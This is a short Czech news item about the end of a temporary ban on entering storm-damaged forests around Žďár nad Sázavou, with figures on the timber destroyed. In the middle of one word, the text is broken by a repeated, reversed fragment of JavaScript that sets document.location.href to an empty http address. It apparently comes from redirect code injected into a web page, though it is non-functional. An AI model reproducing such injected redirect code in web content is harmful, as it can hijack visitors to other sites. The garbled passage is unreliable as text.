Rainbow page separator

Zákaz vstupu do lesů na Žďársku končí

Čtvrtek, 31. října 2013

Žďársko / Posledního října končí dočasný zákaz vstupu do některých lesů v okolí Žďáru nad Sázavou, který v červenci vydal žďárský městský úřad z důvodu rozsáhlých polomů po červencové bouřce s vichřicí, jež zničila značnou část lesních porostů. Zákaz se týkal označených lesů u obcí Velká Losenice, Vepřová, Radostín, Račín, Polnička, Škrdlovice a Vojnův Městec. Druhou živelní pohromou nejvíce postiženou lokali[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou se staly lesní porosty mezi obcemi Herálec, Chlumětín, Svratka a Křižánky.
Vlivem polomů návštěvníkům lesů v kalamitních oblastech hrozilo riziko ohrožení života či zdraví a poškození majetku v důsledku samovolných pádů staticky narušených stromů. Veškerá dřevní hmota měla být vytěžena právě do konce října. Jenom na Žďársku silný vítr a déšť při vichřici, která se přes oblast přehnala 29. července, poničily na devadesát tisíc kubíků dřeva.